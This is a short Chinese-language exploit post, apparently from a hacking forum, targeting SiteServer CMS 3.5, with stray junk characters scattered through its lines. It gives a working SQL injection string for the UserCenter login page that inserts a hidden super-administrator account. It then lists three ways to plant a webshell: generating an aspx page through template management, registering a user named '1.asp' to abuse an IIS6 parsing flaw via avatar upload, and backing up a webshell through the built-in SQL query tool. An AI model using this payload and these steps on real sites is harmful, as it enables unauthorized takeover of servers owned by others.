经测试秒杀最新的3.5版
" c; ^, y0 Y+ w* Gstieserver官网:www.siteserver.cn
' Z T( y4 m9 ZEXP:
) x" e" e, V! F7 g" w直接访问UserCenter/login.aspx& g/ a. x4 N4 n% P# D% P5 c/ o+ N& |
用户名处输入:# Y/ l% q0 }3 L, v: a
. @/ Z: b i9 E# C D% t+ s& B
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
e. X( I- Z- v, t ~$ S" w* e密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
3 S! Z' i* c" f5 l+ r0 _7 ^之后再访问后台SiteServer/login.aspx用插入的用户登陆% Z' p7 M% H O+ V* k. s, n
后台拿webshell的三种方法:
- V: E( t% X J, {6 k一、
- F O) X8 @% M站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. y8 Y/ J6 `8 v- v, U" M
二、) `# J! m, O; |8 _0 a
成员权限-》添加用户-》用户名为:1.asp# |6 f8 B3 Q1 d, E" f. c! p3 S
http://127.0.0.1/usercenter/ r Q; P1 X* y
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell; Z/ Y3 q: V3 l8 C) I9 A
(ps:后台添加用户时不会验证是否含有非法字符); p1 r+ Y& j7 n6 {0 l5 \4 _
三、- S3 y8 X T9 ]! R7 S3 L- |4 k
系统工具-》实用工具-》机器参数查看8 G/ c! M$ W, N# w- B4 |# ~
可以看到数据库类型、名称,WEB路径
' ?. _& @; ~3 H5 V4 K9 K3 m& I' R系统工具-》数据库工具-》SQL语句查询
" F j1 s+ L8 f; C9 I这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |